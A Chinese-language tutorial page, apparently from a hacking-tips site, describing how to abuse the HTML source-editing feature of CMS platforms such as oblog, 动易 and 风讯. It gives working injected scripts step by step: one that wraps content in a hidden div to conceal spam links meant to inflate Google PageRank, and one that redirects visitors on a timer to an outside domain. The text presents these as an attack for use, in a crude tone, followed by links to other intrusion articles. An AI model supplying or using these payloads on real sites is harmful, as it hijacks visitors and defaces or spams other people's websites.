手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
摘要:目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。具体操作是:1,进入"源码"编辑2,输入阶段公分四段:第一段:第二段:d...

目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。

具体操作是:

1,进入"源码"编辑

2,输入阶段公分四段:

第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容>

第二段:<script>document.write('<divstyle="display:none">');</script>

第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看到,且不会被搜索引擎发现>

第四段:<SCRIPT>window.setTimeout("Timer()",1000);functionTimer(){document.location='http://31u.net';}</SCRIPT>

第一段你可以略过,如果你想剧烈的强奸的话。第二段代码是为了隐藏第三段的链接。第四段为定时和跳转。将时间设定超过10秒为好,呵呵有利于搜索引擎收录嘛。

也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。

3,提交。

此方法目前没有解决ubb转换的问题。但是作者目前发现好多的文章系统什么的都没有进行ubb转换,动网论坛目前暂时无法强奸,正在进一步研究中

【关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析】相关文章:

MSSQL自身存储过程的一个注入漏洞

剖析网站遭遇的黑客的三次入侵

由mysql弱口令取得system权限的实战

针对蓝牙PIN码的最新攻击技术细节分析

我是如何发现CCProxy远程溢出漏洞的

特络伊木马如何利用文件关联和设置名

四大漏洞入侵博客

Sql Server 应用程序的高级Sql注入第1/2页

Oblog3.0漏洞曝光

shell.application对象的漏洞描述

精品推荐
分类导航